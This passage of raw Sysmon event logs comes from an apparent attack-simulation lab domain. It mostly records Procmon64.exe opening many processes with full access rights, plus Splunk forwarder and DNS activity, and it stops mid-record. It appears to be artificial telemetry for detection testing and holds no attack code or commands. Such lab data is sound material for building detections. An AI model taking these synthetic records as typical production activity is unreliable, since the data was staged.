10:52:02.632{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.616{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.609{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.524{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B6CC558EE0AF7C657C4D1DA6CAA9F3,SHA256=718AB5C8459A06DE86DD6E54C9A5F63F74BCDAF073D39C52BB6F6D17B2E32302,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.583{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53492-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000288848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.147{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54380- 10341000x8000000000000000288847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.509{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.509{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.486{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.486{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.304{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11D2-6216-2405-000000003802}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.287{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.287{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.287{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.287{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.287{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.271{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-11D2-6216-2405-000000003802}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.271{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2BB-6215-C800-000000003802}1332C:\Program Files\TightVNC\tvnserver.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.271{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11D2-6216-2405-000000003802}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.274{C8EA50B7-11D2-6216-2405-000000003802}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000288833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.240{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2BB-6215-C800-000000003802}1332C:\Program Files\TightVNC\tvnserver.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.224{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:03.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E966D840728CD01F6FC0D8C780A18C0,SHA256=EF9BAE55739E1FB610DA00955E6B9A5025F30E6978C6C8767B75B2FC9064CDBE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.650{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B215039353D165D9383557B9EC1098D,SHA256=943714EF3B88EF4CB697DE52E22BBA360EA41F63F3FC56B42277F3A926C13071,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.588{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.583{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.521{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.519{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.432{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla 